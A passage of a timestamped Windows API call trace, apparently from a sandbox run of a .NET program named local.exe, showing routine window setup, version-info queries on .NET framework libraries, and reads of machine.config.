GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x73cd0000 [0057.094] AdjustWindowRectEx (in: lpRect=0x3ae744, dwStyle=0x5601008d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x3ae744) returned 1 [0057.095] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x73cd0000 [0057.095] AdjustWindowRectEx (in: lpRect=0x3ae740, dwStyle=0x5601000b, bMenu=0, dwExStyle=0x0 | out: lpRect=0x3ae740) returned 1 [0057.095] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x73cd0000 [0057.095] AdjustWindowRectEx (in: lpRect=0x3ae740, dwStyle=0x5601000b, bMenu=0, dwExStyle=0x0 | out: lpRect=0x3ae740) returned 1 [0057.095] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x73cd0000 [0057.095] AdjustWindowRectEx (in: lpRect=0x3ae740, dwStyle=0x5601000b, bMenu=0, dwExStyle=0x0 | out: lpRect=0x3ae740) returned 1 [0057.095] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x73cd0000 [0057.095] AdjustWindowRectEx (in: lpRect=0x3ae740, dwStyle=0x5601000b, bMenu=0, dwExStyle=0x0 | out: lpRect=0x3ae740) returned 1 [0057.104] GetDC (hWnd=0x0) returned 0x1501025e [0057.105] GdipCreateFromHDC (hdc=0x1501025e, graphics=0x3ae618) returned 0x0 [0057.106] GdipGetFontHeight (font=0x4eb2940, graphics=0x4e5fcf0, height=0x3ae610) returned 0x0 [0057.106] GdipDeleteGraphics (graphics=0x4e5fcf0) returned 0x0 [0057.106] ReleaseDC (hWnd=0x0, hDC=0x1501025e) returned 1 [0057.112] GetSystemMetrics (nIndex=5) returned 1 [0057.112] GetSystemMetrics (nIndex=6) returned 1 [0057.113] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x73cd0000 [0057.113] AdjustWindowRectEx (in: lpRect=0x3ae740, dwStyle=0x560101c0, bMenu=0, dwExStyle=0x200 | out: lpRect=0x3ae740) returned 1 [0057.114] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x73cd0000 [0057.114] AdjustWindowRectEx (in: lpRect=0x3ae714, dwStyle=0x56cf0000, bMenu=0, dwExStyle=0x50001 | out: lpRect=0x3ae714) returned 1 [0057.378] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorlib.dll", nBufferLength=0x105, lpBuffer=0x3ae21c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorlib.dll", lpFilePart=0x0) returned 0x3a [0057.378] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae67c) returned 1 [0057.378] GetFileAttributesExW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorlib.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\mscorlib.dll"), fInfoLevelId=0x0, lpFileInformation=0x3ae6f8 | out: lpFileInformation=0x3ae6f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xef914800, ftCreationTime.dwHighDateTime=0x1d0aa91, ftLastAccessTime.dwLowDateTime=0x5d29af20, ftLastAccessTime.dwHighDateTime=0x1d2e676, ftLastWriteTime.dwLowDateTime=0xef914800, ftLastWriteTime.dwHighDateTime=0x1d0aa91, nFileSizeHigh=0x0, nFileSizeLow=0x53b8a0)) returned 1 [0057.379] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae678) returned 1 [0057.380] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorlib.dll", lpdwHandle=0x3ae76c | out: lpdwHandle=0x3ae76c) returned 0x80c [0057.480] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorlib.dll", dwHandle=0x0, dwLen=0x80c, lpData=0x2437624 | out: lpData=0x2437624) returned 1 [0057.483] VerQueryValueW (in: pBlock=0x2437624, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x3ae740, puLen=0x3ae73c | out: lplpBuffer=0x3ae740*=0x2437a24, puLen=0x3ae73c) returned 1 [0057.485] VerQueryValueW (in: pBlock=0x2437624, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\CompanyName", lplpBuffer=0x3ae6c0, puLen=0x3ae6bc | out: lplpBuffer=0x3ae6c0*=0x24376dc, puLen=0x3ae6bc) returned 1 [0057.485] VerQueryValueW (in: pBlock=0x2437624, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\FileDescription", lplpBuffer=0x3ae6c0, puLen=0x3ae6bc | out: lplpBuffer=0x3ae6c0*=0x2437730, puLen=0x3ae6bc) returned 1 [0057.485] VerQueryValueW (in: pBlock=0x2437624, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\FileVersion", lplpBuffer=0x3ae6c0, puLen=0x3ae6bc | out: lplpBuffer=0x3ae6c0*=0x24377b0, puLen=0x3ae6bc) returned 1 [0057.485] VerQueryValueW (in: pBlock=0x2437624, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\InternalName", lplpBuffer=0x3ae6c0, puLen=0x3ae6bc | out: lplpBuffer=0x3ae6c0*=0x243780c, puLen=0x3ae6bc) returned 1 [0057.485] VerQueryValueW (in: pBlock=0x2437624, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\LegalCopyright", lplpBuffer=0x3ae6c0, puLen=0x3ae6bc | out: lplpBuffer=0x3ae6c0*=0x243784c, puLen=0x3ae6bc) returned 1 [0057.485] VerQueryValueW (in: pBlock=0x2437624, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\OriginalFilename", lplpBuffer=0x3ae6c0, puLen=0x3ae6bc | out: lplpBuffer=0x3ae6c0*=0x24378d4, puLen=0x3ae6bc) returned 1 [0057.485] VerQueryValueW (in: pBlock=0x2437624, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\ProductName", lplpBuffer=0x3ae6c0, puLen=0x3ae6bc | out: lplpBuffer=0x3ae6c0*=0x2437910, puLen=0x3ae6bc) returned 1 [0057.485] VerQueryValueW (in: pBlock=0x2437624, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\ProductVersion", lplpBuffer=0x3ae6c0, puLen=0x3ae6bc | out: lplpBuffer=0x3ae6c0*=0x2437968, puLen=0x3ae6bc) returned 1 [0057.485] VerQueryValueW (in: pBlock=0x2437624, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\Comments", lplpBuffer=0x3ae6c0, puLen=0x3ae6bc | out: lplpBuffer=0x3ae6c0*=0x2437994, puLen=0x3ae6bc) returned 1 [0057.485] VerQueryValueW (in: pBlock=0x2437624, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\LegalTrademarks", lplpBuffer=0x3ae6c0, puLen=0x3ae6bc | out: lplpBuffer=0x3ae6c0*=0x0, puLen=0x3ae6bc) returned 0 [0057.485] VerQueryValueW (in: pBlock=0x2437624, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\PrivateBuild", lplpBuffer=0x3ae6c0, puLen=0x3ae6bc | out: lplpBuffer=0x3ae6c0*=0x24379d0, puLen=0x3ae6bc) returned 1 [0057.485] VerQueryValueW (in: pBlock=0x2437624, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\SpecialBuild", lplpBuffer=0x3ae6c0, puLen=0x3ae6bc | out: lplpBuffer=0x3ae6c0*=0x0, puLen=0x3ae6bc) returned 0 [0057.485] VerQueryValueW (in: pBlock=0x2437624, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x3ae6b4, puLen=0x3ae6b0 | out: lplpBuffer=0x3ae6b4*=0x2437a24, puLen=0x3ae6b0) returned 1 [0057.485] VerLanguageNameW (in: wLang=0x409, szLang=0x3ae444, cchLang=0x100 | out: szLang="English (United States)") returned 0x17 [0057.486] VerQueryValueW (in: pBlock=0x2437624, lpSubBlock="\\", lplpBuffer=0x3ae6c4, puLen=0x3ae6c0 | out: lplpBuffer=0x3ae6c4*=0x243764c, puLen=0x3ae6c0) returned 1 [0057.492] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\local.exe.config", nBufferLength=0x105, lpBuffer=0x3ae160, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\local.exe.config", lpFilePart=0x0) returned 0x36 [0057.492] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\local.exe.config", nBufferLength=0x105, lpBuffer=0x3ae10c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\local.exe.config", lpFilePart=0x0) returned 0x36 [0057.494] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\", nBufferLength=0x105, lpBuffer=0x3ae0d8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\", lpFilePart=0x0) returned 0x2e [0057.500] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config", nBufferLength=0x105, lpBuffer=0x3ae0a4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config", lpFilePart=0x0) returned 0x43 [0057.500] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config", nBufferLength=0x105, lpBuffer=0x3ae108, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config", lpFilePart=0x0) returned 0x43 [0057.500] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae568) returned 1 [0057.500] GetFileAttributesExW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\config\\machine.config"), fInfoLevelId=0x0, lpFileInformation=0x3ae5e4 | out: lpFileInformation=0x3ae5e4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc0cc4300, ftCreationTime.dwHighDateTime=0x1cd5cf4, ftLastAccessTime.dwLowDateTime=0xcf7ee640, ftLastAccessTime.dwHighDateTime=0x1d2e675, ftLastWriteTime.dwLowDateTime=0xc0cc4300, ftLastWriteTime.dwHighDateTime=0x1cd5cf4, nFileSizeHigh=0x0, nFileSizeLow=0x8c8f)) returned 1 [0057.500] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae564) returned 1 [0057.500] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config", nBufferLength=0x105, lpBuffer=0x3ae044, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config", lpFilePart=0x0) returned 0x43 [0057.500] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae538) returned 1 [0057.500] CreateFileW (lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\config\\machine.config"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x3d0 [0057.501] GetFileType (hFile=0x3d0) returned 0x1 [0057.501] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae534) returned 1 [0057.501] GetFileType (hFile=0x3d0) returned 0x1 [0057.502] GetFileSize (in: hFile=0x3d0, lpFileSizeHigh=0x3ae570 | out: lpFileSizeHigh=0x3ae570*=0x0) returned 0x8c8f [0057.502] ReadFile (in: hFile=0x3d0, lpBuffer=0x243a744, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x3ae52c, lpOverlapped=0x0 | out: lpBuffer=0x243a744*, lpNumberOfBytesRead=0x3ae52c*=0x1000, lpOverlapped=0x0) returned 1 [0057.504] ReadFile (in: hFile=0x3d0, lpBuffer=0x243a744, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x3ae4cc, lpOverlapped=0x0 | out: lpBuffer=0x243a744*, lpNumberOfBytesRead=0x3ae4cc*=0x1000, lpOverlapped=0x0) returned 1 [0057.504] ReadFile (in: hFile=0x3d0, lpBuffer=0x243a744, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x3ae448, lpOverlapped=0x0 | out: lpBuffer=0x243a744*, lpNumberOfBytesRead=0x3ae448*=0x1000, lpOverlapped=0x0) returned 1 [0057.504] ReadFile (in: hFile=0x3d0, lpBuffer=0x243a744, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x3ae448, lpOverlapped=0x0 | out: lpBuffer=0x243a744*, lpNumberOfBytesRead=0x3ae448*=0x1000, lpOverlapped=0x0) returned 1 [0057.504] ReadFile (in: hFile=0x3d0, lpBuffer=0x243a744, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x3ae448, lpOverlapped=0x0 | out: lpBuffer=0x243a744*, lpNumberOfBytesRead=0x3ae448*=0x1000, lpOverlapped=0x0) returned 1 [0057.504] ReadFile (in: hFile=0x3d0, lpBuffer=0x243a744, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x3ae448, lpOverlapped=0x0 | out: lpBuffer=0x243a744*, lpNumberOfBytesRead=0x3ae448*=0x1000, lpOverlapped=0x0) returned 1 [0057.504] ReadFile (in: hFile=0x3d0, lpBuffer=0x243a744, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x3ae4c8, lpOverlapped=0x0 | out: lpBuffer=0x243a744*, lpNumberOfBytesRead=0x3ae4c8*=0x1000, lpOverlapped=0x0) returned 1 [0057.505] ReadFile (in: hFile=0x3d0, lpBuffer=0x243a744, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x3ae448, lpOverlapped=0x0 | out: lpBuffer=0x243a744*, lpNumberOfBytesRead=0x3ae448*=0x1000, lpOverlapped=0x0) returned 1 [0057.505] ReadFile (in: hFile=0x3d0, lpBuffer=0x243a744, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x3ae448, lpOverlapped=0x0 | out: lpBuffer=0x243a744*, lpNumberOfBytesRead=0x3ae448*=0xc8f, lpOverlapped=0x0) returned 1 [0057.505] ReadFile (in: hFile=0x3d0, lpBuffer=0x243a744, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x3ae4f0, lpOverlapped=0x0 | out: lpBuffer=0x243a744*, lpNumberOfBytesRead=0x3ae4f0*=0x0, lpOverlapped=0x0) returned 1 [0057.505] CloseHandle (hObject=0x3d0) returned 1 [0057.505] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\local.exe.config", nBufferLength=0x105, lpBuffer=0x3ae0a0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\local.exe.config", lpFilePart=0x0) returned 0x36 [0057.506] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\local.exe.config", nBufferLength=0x105, lpBuffer=0x3ae104, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\local.exe.config", lpFilePart=0x0) returned 0x36 [0057.506] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae564) returned 1 [0057.506] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\local.exe.config" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\local.exe.config"), fInfoLevelId=0x0, lpFileInformation=0x3ae5e0 | out: lpFileInformation=0x3ae5e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0057.506] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae560) returned 1 [0057.506] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\local.exe", nBufferLength=0x105, lpBuffer=0x3ae21c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\local.exe", lpFilePart=0x0) returned 0x2f [0057.506] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae67c) returned 1 [0057.506] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\local.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\local.exe"), fInfoLevelId=0x0, lpFileInformation=0x3ae6f8 | out: lpFileInformation=0x3ae6f8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0057.506] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae678) returned 1 [0057.515] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\local.exe", nBufferLength=0x105, lpBuffer=0x3ae224, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\local.exe", lpFilePart=0x0) returned 0x2f [0057.515] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\local.exe", nBufferLength=0x105, lpBuffer=0x3ae1b8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\local.exe", lpFilePart=0x0) returned 0x2f [0057.518] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Windows.Forms\\v4.0_4.0.0.0__b77a5c561934e089\\System.Windows.Forms.dll", nBufferLength=0x105, lpBuffer=0x3ae21c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Windows.Forms\\v4.0_4.0.0.0__b77a5c561934e089\\System.Windows.Forms.dll", lpFilePart=0x0) returned 0x77 [0057.519] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae67c) returned 1 [0057.519] GetFileAttributesExW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Windows.Forms\\v4.0_4.0.0.0__b77a5c561934e089\\System.Windows.Forms.dll" (normalized: "c:\\windows\\microsoft.net\\assembly\\gac_msil\\system.windows.forms\\v4.0_4.0.0.0__b77a5c561934e089\\system.windows.forms.dll"), fInfoLevelId=0x0, lpFileInformation=0x3ae6f8 | out: lpFileInformation=0x3ae6f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xef914800, ftCreationTime.dwHighDateTime=0x1d0aa91, ftLastAccessTime.dwLowDateTime=0x6b0932a0, ftLastAccessTime.dwHighDateTime=0x1d2e676, ftLastWriteTime.dwLowDateTime=0xef914800, ftLastWriteTime.dwHighDateTime=0x1d0aa91, nFileSizeHigh=0x0, nFileSizeLow=0x498ed0)) returned 1 [0057.519] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae678) returned 1 [0057.519] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Windows.Forms\\v4.0_4.0.0.0__b77a5c561934e089\\System.Windows.Forms.dll", lpdwHandle=0x3ae76c | out: lpdwHandle=0x3ae76c) returned 0x7ec [0057.523] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Windows.Forms\\v4.0_4.0.0.0__b77a5c561934e089\\System.Windows.Forms.dll", dwHandle=0x0, dwLen=0x7ec, lpData=0x2441ca4 | out: lpData=0x2441ca4) returned 1 [0057.524] VerQueryValueW (in: pBlock=0x2441ca4, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x3ae740, puLen=0x3ae73c | out: lplpBuffer=0x3ae740*=0x2442094, puLen=0x3ae73c) returned 1 [0057.524] VerQueryValueW (in: pBlock=0x2441ca4, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\CompanyName", lplpBuffer=0x3ae6c0, puLen=0x3ae6bc | out: lplpBuffer=0x3ae6c0*=0x2441d5c, puLen=0x3ae6bc) returned 1 [0057.524] VerQueryValueW (in: pBlock=0x2441ca4, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\FileDescription", lplpBuffer=0x3ae6c0, puLen=0x3ae6bc | out: lplpBuffer=0x3ae6c0*=0x2441db0, puLen=0x3ae6bc) returned 1 [0057.524] VerQueryValueW (in: pBlock=0x2441ca4, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\FileVersion", lplpBuffer=0x3ae6c0, puLen=0x3ae6bc | out: lplpBuffer=0x3ae6c0*=0x2441df0, puLen=0x3ae6bc) returned 1 [0057.524] VerQueryValueW (in: pBlock=0x2441ca4, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\InternalName", lplpBuffer=0x3ae6c0, puLen=0x3ae6bc | out: lplpBuffer=0x3ae6c0*=0x2441e4c, puLen=0x3ae6bc) returned 1 [0057.524] VerQueryValueW (in: pBlock=0x2441ca4, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\LegalCopyright", lplpBuffer=0x3ae6c0, puLen=0x3ae6bc | out: lplpBuffer=0x3ae6c0*=0x2441ea4, puLen=0x3ae6bc) returned 1 [0057.524] VerQueryValueW (in: pBlock=0x2441ca4, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\OriginalFilename", lplpBuffer=0x3ae6c0, puLen=0x3ae6bc | out: lplpBuffer=0x3ae6c0*=0x2441f2c, puLen=0x3ae6bc) returned 1 [0057.524] VerQueryValueW (in: pBlock=0x2441ca4, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\ProductName", lplpBuffer=0x3ae6c0, puLen=0x3ae6bc | out: lplpBuffer=0x3ae6c0*=0x2441f80, puLen=0x3ae6bc) returned 1 [0057.524] VerQueryValueW (in: pBlock=0x2441ca4, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\ProductVersion", lplpBuffer=0x3ae6c0, puLen=0x3ae6bc | out: lplpBuffer=0x3ae6c0*=0x2441fd8, puLen=0x3ae6bc) returned 1 [0057.524] VerQueryValueW (in: pBlock=0x2441ca4, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\Comments", lplpBuffer=0x3ae6c0, puLen=0x3ae6bc | out: lplpBuffer=0x3ae6c0*=0x2442004, puLen=0x3ae6bc) returned 1 [0057.524] VerQueryValueW (in: pBlock=0x2441ca4, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\LegalTrademarks", lplpBuffer=0x3ae6c0, puLen=0x3ae6bc | out: lplpBuffer=0x3ae6c0*=0x0, puLen=0x3ae6bc) returned 0 [0057.525] VerQueryValueW (in: pBlock=0x2441ca4, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\PrivateBuild", lplpBuffer=0x3ae6c0, puLen=0x3ae6bc | out: lplpBuffer=0x3ae6c0*=0x2442040, puLen=0x3ae6bc) returned 1 [0057.525] VerQueryValueW (in: pBlock=0x2441ca4, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\SpecialBuild", lplpBuffer=0x3ae6c0, puLen=0x3ae6bc | out: lplpBuffer=0x3ae6c0*=0x0, puLen=0x3ae6bc) returned 0 [0057.525] VerQueryValueW (in: pBlock=0x2441ca4, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x3ae6b4, puLen=0x3ae6b0 | out: lplpBuffer=0x3ae6b4*=0x2442094, puLen=0x3ae6b0) returned 1 [0057.525] VerLanguageNameW (in: wLang=0x409, szLang=0x3ae444, cchLang=0x100 | out: szLang="English (United States)") returned 0x17 [0057.525] VerQueryValueW (in: pBlock=0x2441ca4, lpSubBlock="\\", lplpBuffer=0x3ae6c4, puLen=0x3ae6c0 | out: lplpBuffer=0x3ae6c4*=0x2441ccc, puLen=0x3ae6c0) returned 1 [0057.525] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System\\v4.0_4.0.0.0__b77a5c561934e089\\System.dll", nBufferLength=0x105, lpBuffer=0x3ae21c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System\\v4.0_4.0.0.0__b77a5c561934e089\\System.dll", lpFilePart=0x0) returned 0x5b [0057.525] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae67c) returned 1 [0057.525] GetFileAttributesExW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System\\v4.0_4.0.0.0__b77a5c561934e089\\System.dll" (normalized: "c:\\windows\\microsoft.net\\assembly\\gac_msil\\system\\v4.0_4.0.0.0__b77a5c561934e089\\system.dll"), fInfoLevelId=0x0, lpFileInformation=0x3ae6f8 | out: lpFileInformation=0x3ae6f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xef914800, ftCreationTime.dwHighDateTime=0x1d0aa91, ftLastAccessTime.dwLowDateTime=0x676d9d20, ftLastAccessTime.dwHighDateTime=0x1d2e676, ftLastWriteTime.dwLowDateTime=0xef914800, ftLastWriteTime.dwHighDateTime=0x1d0aa91, nFileSizeHigh=0x0, nFileSizeLow=0x352280)) returned 1 [0057.526] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae678) returned 1 [0057.526] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System\\v4.0_4.0.0.0__b77a5c561934e089\\System.dll", lpdwHandle=0x3ae76c | out: lpdwHandle=0x3ae76c) returned 0x77c [0057.558] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System\\v4.0_4.0.0.0__b77a5c561934e089\\System.dll", dwHandle=0x0, dwLen=0x77c, lpData=0x2443f30 | out: lpData=0x2443f30) returned 1 [0057.560] VerQueryValueW (in: pBlock=0x2443f30, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x3ae740, puLen=0x3ae73c | out: lplpBuffer=0x3ae740*=0x24442e8, puLen=0x3ae73c) returned 1 [0057.560] VerQueryValueW (in: pBlock=0x2443f30, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\CompanyName", lplpBuffer=0x3ae6c0, puLen=0x3ae6bc | out: lplpBuffer=0x3ae6c0*=0x2443fe8, puLen=0x3ae6bc) returned 1 [0057.560] VerQueryValueW (in: pBlock=0x2443f30, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\FileDescription", lplpBuffer=0x3ae6c0, puLen=0x3ae6bc | out: lplpBuffer=0x3ae6c0*=0x244403c, puLen=0x3ae6bc) returned 1 [0057.560] VerQueryValueW (in: pBlock=0x2443f30, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\FileVersion", lplpBuffer=0x3ae6c0, puLen=0x3ae6bc | out: lplpBuffer=0x3ae6c0*=0x244407c, puLen=0x3ae6bc) returned 1 [0057.560] VerQueryValueW (in: pBlock=0x2443f30, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\InternalName", lplpBuffer=0x3ae6c0, puLen=0x3ae6bc | out: lplpBuffer=0x3ae6c0*=0x24440d8, puLen=0x3ae6bc) returned 1 [0057.560] VerQueryValueW (in: pBlock=0x2443f30, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\LegalCopyright", lplpBuffer=0x3ae6c0, puLen=0x3ae6bc | out: lplpBuffer=0x3ae6c0*=0x2444114, puLen=0x3ae6bc) returned 1 [0057.560] VerQueryValueW (in: pBlock=0x2443f30, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\OriginalFilename", lplpBuffer=0x3ae6c0, puLen=0x3ae6bc | out: lplpBuffer=0x3ae6c0*=0x244419c, puLen=0x3ae6bc) returned 1 [0057.560] VerQueryValueW (in: pBlock=0x2443f30, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\ProductName", lplpBuffer=0x3ae6c0, puLen=0x3ae6bc | out: lplpBuffer=0x3ae6c0*=0x24441d4, puLen=0x3ae6bc) returned 1 [0057.560] VerQueryValueW (in: pBlock=0x2443f30, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\ProductVersion", lplpBuffer=0x3ae6c0, puLen=0x3ae6bc | out: lplpBuffer=0x3ae6c0*=0x244422c, puLen=0x3ae6bc) returned 1 [0057.560] VerQueryValueW (in: pBlock=0x2443f30, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\Comments", lplpBuffer=0x3ae6c0, puLen=0x3ae6bc | out: lplpBuffer=0x3ae6c0*=0x2444258, puLen=0x3ae6bc) returned 1 [0057.560] VerQueryValueW (in: pBlock=0x2443f30, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\LegalTrademarks", lplpBuffer=0x3ae6c0, puLen=0x3ae6bc | out: 